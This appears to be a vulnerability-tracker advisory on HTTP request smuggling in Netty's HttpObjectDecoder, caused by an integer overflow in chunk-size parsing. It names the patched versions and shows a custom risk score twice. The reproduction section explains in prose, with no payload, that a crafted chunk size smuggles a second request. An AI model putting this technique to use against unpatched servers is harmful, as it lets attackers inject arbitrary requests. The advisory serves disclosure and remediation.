Primary

Context

Netty HTTP Request Smuggling Vulnerability Due to Chunk Size Parsing Overflow

Vulnerability

Patched

A vulnerability in Netty's HTTP codec prior to versions 4.2.13.Final and 4.1.133.Final allows for HTTP request smuggling attacks. The issue arises because the chunk size parser in 'HttpObjectDecoder' silently overflows the integer type. This overflow can be exploited by crafting a specific chunk size, enabling an attacker to inject and smuggle additional HTTP requests within a chunked transfer encoding.

Impact

Exploitation of this vulnerability leads to HTTP request smuggling, where an attacker can inject arbitrary HTTP requests that are processed by the server.

Reproduction

The vulnerability can be reproduced by sending a chunked HTTP request with a crafted chunk size that causes an integer overflow. The Netty server will parse the request incorrectly, allowing a second, smuggled request to be injected and processed.

Remediation

Users should upgrade to Netty versions 4.2.13.Final or 4.1.133.Final.

Added: May 13, 2026, 7:27 PM

Updated: May 13, 2026, 7:27 PM

Vulnerability Rating

Custom Algorithm

spread

8.6

impact

0.6

exploitability

8.9

remediation

7.7

relevance

8.2

threat

6.4

urgency

2.9

incentive

8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

8.6

impact

0.6

exploitability

8.9

remediation

7.7

relevance

8.2

threat

6.4

urgency

2.9

incentive

8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Netty HTTP Request Smuggling Vulnerability Due to Chunk Size Parsing Overflow

Vulnerability

Impact

Reproduction

Remediation

Affected Products

Netty

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating